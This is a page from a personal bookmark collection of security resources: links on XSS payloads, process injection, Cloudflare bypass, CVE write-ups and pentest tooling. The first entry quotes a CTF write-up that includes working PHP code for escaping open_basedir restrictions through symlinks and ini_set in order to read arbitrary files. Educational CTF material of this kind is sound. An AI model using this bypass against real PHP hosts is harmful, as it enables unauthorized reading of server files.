788 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
◄Older
page 4 / 40
Newer►
  • 52.0.228.201/writeup.txt

    This challenge was about bypassing PHP open_basedir when having a restricted arbitrary PHP code execution. Most of commons functions to execute commands were blocked.

    The initial solution that was intended used the following facts :

    • open_basedir can be tampered at runtime with ini_set, but is restricted by open_basedir itself (in other words, we should only be able to harden the existing rule)
    • open_basedir on symlink is working
    • call ini_set for open_basedir checks are only done at the time of changing the rule; the file system can change then

    That means that we can point open_basedir to a regular file under /tmp/, and then switch it to a symlink pointing to ../../../../[...] - but to create such a symlink, we need to create an arborescence that allows do to so without breaching the rule :

    chdir('/tmp');
    $x='';
    for($i=0;$i<10;$i++){
    mkdir('z');
    chdir('z');
    $x.='../';
    }
    symlink($x,'x');
    symlink($x,'y');
    ini_set('open_basedir','x:y:/tmp/x');
    rename('x',$x.'/x');
    chdir('y');
    chdir('x');
    ini_set('open_basedir','/:/tmp/z');
    echo file_get_contents('/flag.txt');

    Congratz to every solvers!
    Blaklis

    September 26, 2024 at 8:39:29 AM UTC * - permalink -
    QRCode
    - http://52.0.228.201/writeup.txt
    php bypass open_basedir ctf
  • ProcessInjectionTechniques | This comprehensive process injection series is crafted for cybersecurity enthusiasts, researchers, and professionals who aim to stay at the forefront of the field. It serves as a central repository of knowledge, offering in-depth exploration of various process injection techniques used by adversaries.
    September 15, 2024 at 3:09:11 PM UTC * - permalink -
    QRCode
    - https://offensive-panda.github.io/ProcessInjectionTechniques/
    process injection
  • GPU Passthrough to VM - 3os
    September 11, 2024 at 11:27:26 AM UTC * - permalink -
    QRCode
    - https://3os.org/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/
    gpu passthrough proxmox
  • Wei's OneDrive
    August 12, 2024 at 3:33:30 PM UTC * - permalink -
    QRCode
    - https://od.cloudsploit.top/tools/
    hacking tools
  • HTWMCL?
    July 16, 2024 at 3:49:48 PM UTC * - permalink -
    QRCode
    - https://www.htwmcl.fr/
    howto command line find tools
  • Fuzzing Windows RPC with RpcView | itm4n's blog
    July 11, 2024 at 10:41:36 AM UTC * - permalink -
    QRCode
    - https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
    rpc research rpcview fuzz
  • thumbnail
    Security Cameras - A Penetration Tester's Journey | Tobia Bocchi: whoami, blogging, notes
    July 9, 2024 at 11:24:14 AM UTC * - permalink -
    QRCode
    - https://tobiabocchi.me/posts/ip-cam-pentester-journey/
    camera ip hardware
  • Localtonet | Localhost to Internet
    July 9, 2024 at 11:23:40 AM UTC * - permalink -
    QRCode
    - https://localtonet.com/
    ngrok tunnel tcp
  • thumbnail
    FalconFriday — Detecting Active Directory Data Collection — 0xFF21 - FalconForce
    July 2, 2024 at 2:04:55 PM UTC * - permalink -
    QRCode
    - https://falconforce.nl/falconfriday-detecting-active-directory-data-collection-0xff21/
    ad research bloodhound ldap
  • How to Bypass Cloudflare in 2024: The 8 Best Methods - ZenRows

    cloudflare waiting room challenge writeup

    July 1, 2024 at 4:14:26 PM UTC * - permalink -
    QRCode
    - https://www.zenrows.com/blog/bypass-cloudflare
    cloudflare bypass
  • dreamkinn/CompileCSDocker: Compile SharpHound and others on Linux
    June 12, 2024 at 10:20:23 AM UTC * - permalink -
    QRCode
    - https://github.com/dreamkinn/CompileCSDocker
    compile csharp tools github linux windows toolbox dreamkinn
  • Bypassing Veeam Authentication CVE-2024-29849
    June 10, 2024 at 8:47:44 AM UTC * - permalink -
    QRCode
    - https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
    veeam cve auth bypass interne
  • mXSS cheatsheet
    May 14, 2024 at 10:05:17 AM UTC * - permalink -
    QRCode
    - https://sonarsource.github.io/mxss-cheatsheet/
    mxss cheatsheet xss
  • thumbnail
    Step through the source code of AEM's Apache Sling Engine – implementationDetails()

    Sling's interpretation of a request may differ from your own. Hook up a debugger to see how its working behind the scenes.

    May 13, 2024 at 11:04:27 AM UTC * - permalink -
    QRCode
    - https://implementationdetails.dev/blog/2020/09/30/stepping-through-the-sling-engine-source/
    aem research sling
  • Writeup: Keycloak open redirect (CVE-2023-6927)
    April 19, 2024 at 4:49:12 PM UTC * - permalink -
    QRCode
    - https://securityblog.omegapoint.se/en/writeup-keycloak-cve-2023-6927/
    keycloak cve writeup redirect_ui
  • Weekly Top 5 Hacker-Relevant Vulnerabilities - Ruhr Security Blog
    April 19, 2024 at 1:42:03 PM UTC * - permalink -
    QRCode
    - https://blog.ruhrsecurity.com/posts/weekly-top-5-vulnerabilities/
    veille
  • thumbnail
    XSS-Payloads/Without-Parentheses.md at master · RenwaX23/XSS-Payloads
    April 8, 2024 at 1:39:30 PM UTC * - permalink -
    QRCode
    - https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md
    xss waf bypass cloudflare
  • thumbnail
    AEM SaaS Like a Champion ❤️🏆🚀 - AEM.Design
    March 29, 2024 at 3:47:38 PM UTC * - permalink -
    QRCode
    - https://aem.design/blog/2023/05/03/aem-saas-like-a-champion
    aem research docker fullstack
  • thumbnail
    topscoder/nuclei-wordfence-cve: You just found a hidden gem 💎 This repo contains a massive amount (10,000+) of WordPress related Nuclei templates. Updated daily!
    March 20, 2024 at 3:55:03 PM UTC * - permalink -
    QRCode
    - https://github.com/topscoder/nuclei-wordfence-cve/tree/main
    wordpress vuln nuclei audit
  • thumbnail
    aem-links/curl_cheatsheet.md at master · paulrohrbeck/aem-links
    March 15, 2024 at 4:44:25 PM UTC * - permalink -
    QRCode
    - https://github.com/paulrohrbeck/aem-links/blob/master/curl_cheatsheet.md
    aem curl
Links per page: 20 50 100
◄Older
page 4 / 40
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation